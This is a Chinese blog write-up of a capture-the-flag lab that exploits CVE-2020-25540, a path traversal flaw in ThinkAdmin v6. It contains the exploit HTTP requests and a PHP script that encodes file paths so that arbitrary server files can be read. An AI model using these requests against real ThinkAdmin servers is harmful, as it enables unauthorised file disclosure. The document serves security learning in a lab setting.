当前位置: 首页 > news >正文

春秋云镜——CVE-2020-25540

本博客所有网络安全相关教程、漏洞原理、渗透实操、攻防技术等内容,仅用于合法安全学习、白帽技术交流、企业授权安全测试。
所有技术严禁用于未授权探测、非法入侵、数据窃取、网络攻击等任何违反《中华人民共和国网络安全法》的违法行为。
任何个人利用本文内容实施违规操作,所产生的一切法律责任与后果均由当事人自行承担,与本人无关。
倡导正向网络安全学习,坚守白帽底线,共建清朗网络环境。

一、靶机介绍

ThinkAdmin 6版本存在路径遍历漏洞,可利用该漏洞通过GET请求编码参数任意读取远程服务器上的文件.

POST /admin/index.php?s=admin/api.Update/node HTTP/2 Host: eci-2ze2reusg8pi7fbsqy9g.cloudeci1.ichunqiu.com Content-Type: application/x-www-form-urlencoded Content-Length: 13 rules=["."]

二、环境信息

靶场地址:http://eci-2ze2reusg8pi7fbsqy9g.cloudeci1.ichunqiu.com:80/admin/login.html
目标版本:ThinkAdmin v6(PHP 7.2.20)
工具:Burp Suite、PHP 在线运行环境

三、漏洞复现步骤

步骤 1:验证漏洞存在(目录遍历)

首先使用 node 接口验证目录遍历功能,确认漏洞存在:
构造 POST 请求

POST /admin/index.php?s=admin/api.Update/node HTTP/1.1 Host: eci-2ze2reusg8pi7fbsqy9g.cloudeci1.ichunqiu.com Content-Type: application/x-www-form-urlencoded Content-Length: 22 rules=["../../../flag"]

响应结果(成功)

说明:文件列表成功返回,且确认 ../../../flag 路径下存在目标文件,漏洞存在。

步骤 2:构造自定义加密算法

ThinkAdmin 的 get 接口使用了 UTF-8→GBK→36 进制两位补 0 的自定义加密算法,需编写 PHP 脚本生成正确的 encode 值:
加密脚本

<?php function encode($content) { // 1. UTF-8转GBK $string = iconv('UTF-8', 'GBK//TRANSLIT', $content); $length = strlen($string); $chars = ''; // 2. 每个字符转36进制,两位一组补0 for ($i = 0; $i < $length; $i++) { $chars .= str_pad(base_convert(ord($string[$i]), 10, 36), 2, 0, 0); } return $chars; } // 目标路径 $content = "../../../flag"; echo "Encode Result: " . encode($content); ?>

运行结果
得到加密后的 encode 值:lala1blala1blala1b2u302p2v

步骤 3:读取目标文件(flag)

使用生成的 encode 值构造 get 接口请求,读取 flag 文件:
构造 GET 请求(HTTP/1.1)

GET /admin/index.php?s=admin/api.Update/get&encode=lala1blala1blala1b2u302p2v HTTP/1.1 Host: eci-2ze2reusg8pi7fbsqy9g.cloudeci1.ichunqiu.com

响应结果(解码前)
响应体为 Base64 编码内容

解码后得到:

http://www.jsqmd.com/news/933158/

相关文章:

  • # JSON美化性能优化指南
  • 2026年兆麟公司固定资产管理维保品牌推荐,靠谱的品牌有哪些? - mypinpai
  • 从0到1:我是如何设计大模型结构化输出系统的
  • Arduino状态机与中断实战:LCD灯光游戏开发全解析
  • 别再手动调参数了!用Unity 2022的Visual Effect Graph重新设计你的粒子烟花
  • 从一次网站访问失败说起:用Wireshark抓包分析Nginx的IPv4/IPv6双栈配置到底生不生效
  • 千问 LeetCode 2926. 平衡子序列的最大和 C++实现
  • 长沙挤塑板厂家现货多少钱? - 工业推荐榜
  • Simulink不连续模块组实战:用Saturation和DeadZone搞定汽车控制器的信号处理(2021b版)
  • STM32CubeMX配置FSMC驱动TFT-LCD屏,再也不用担心触摸漂移了(附XPT2046校准代码)
  • 避坑指南:用ArcGIS统计格网耕地比例时,FID连接和创建唯一ID到底哪个更靠谱?
  • Django+Vue基于协同过滤算法的图书推荐系统源码+论文
  • Cadence Virtuoso IC618实战:手把手教你搭建OTA电路并完成AC仿真(附避坑指南)
  • 别再为精度发愁了!用OpenFHE的Meta-BTS迭代自举,轻松实现CKKS高精度计算
  • Simulink里手搭的BLDC双闭环控制模型:电流环+转速环,带反电势、调制和三相电流计算
  • 全流程托管,价值倍增——178软文网新闻营销重构企业品牌运营新范式
  • 2026年天然味鱼饵推荐,今晚吃鱼口碑好 - 工业品牌热点
  • AI赋能者:从专用智能到人机协同的未来
  • 如何专业配置MPC Video Renderer:免费HDR视频渲染终极指南
  • 【Sora 2企业级部署密钥】:如何绕过版权水印、强制帧率锁定与LMS系统直连(附未公开API调用实测日志)
  • 2026年RFID采集器口碑与选购指南 - myqiye
  • 别再只打包APK了!用Unity 2022把游戏快速部署到安卓手机实时调试
  • 从HBM到3D混合键合:一文看懂AI芯片背后的‘内存墙’突破与封装技术演进
  • 别小看这颗几pF的电容:手把手教你给运放反馈电阻并联电容,彻底告别自激振荡
  • Spring Boot 3 + Swagger 3 + Knife4j 4.1.0:从配置到美化,打造团队专属API文档门户
  • Vatee:把技术架构做扎实,长期观察者更容易感受到的逻辑
  • 用GD32F3x0驱动TDC-GP22(SSP1922)做高精度测距:从SPI配置到数据解析全流程
  • 认知雷达与TRIS技术:自适应雷达系统的新突破
  • 2026年全国连锁奢侈品黄金回收品牌公司哪家好 - myqiye
  • CLIP模型实战避坑指南:从数据清洗到Prompt设计的5个关键细节